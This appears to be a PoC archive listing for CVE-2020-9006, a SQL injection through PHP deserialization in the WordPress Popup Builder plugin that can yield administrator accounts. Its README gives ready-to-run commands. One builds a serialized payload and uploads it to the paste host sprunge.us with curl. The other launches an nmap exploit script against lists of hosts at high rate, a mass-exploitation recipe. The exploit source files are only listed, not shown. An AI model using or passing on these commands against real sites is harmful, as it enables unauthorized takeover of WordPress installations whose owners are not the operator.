CVE-2020-9006 PoC — WordPress Sygnoos Popup Builder SQL注入漏洞

Source

https://github.com/s3rgeym/cve-2020-9006

Associated Vulnerability

Title:WordPress Sygnoos Popup Builder SQL注入漏洞 (CVE-2020-9006)
Description:WordPress是WordPress基金会的一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。Sygnoos Popup Builder是使用在其中的一个窗口弹出插件。 WordPress Sygnoos Popup Builder 2.2.8版本至2.6.7.6版本中的sg_popup_ajax.php文件的‘sgImportPopups’函数存在SQL注入漏洞。攻击者可利用该漏洞创建任意的WordPress Administrator账户，进而可能执行代码。

Readme

# CVE-2020-9006: Wordpress Popup-Builder Plugin Exploit

Usage:

```zsh
# Create and upload payload
# Also see: php create-serialized-payload.php -h
$ php create-serialized-payload.php | curl -F 'sprunge=<-' http://sprunge.us
http://sprunge.us/XXXXXX

# Run exploit
$ nmap --script ./cve-2020-9006 --script-args http.useragent='Mozilla/5.0',payload-url='http://sprunge.us/XXXXXX
' --min-parallelism 64 --min-rate 1000 --max-retries 1 -p 80,443 -oX report.xml -d ...hosts
```

## Links

- [CVE-2020-9006 – popup-builder WP Plugin SQL injection via PHP Deserialization](https://zeroauth.ltd/blog/2020/02/16/cve-2020-9006-popup-builder-wp-plugin-sql-injection-via-php-deserialization/)

File Snapshot


 [4.0K]  /data/pocs/d49d521f1c0f1f75bf38516bb9c35e608d55df26
├── [2.1K]  create-serialized-payload.php
├── [1.6K]  cve-2020-9006.nse
└── [ 685]  README.md

0 directories, 3 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!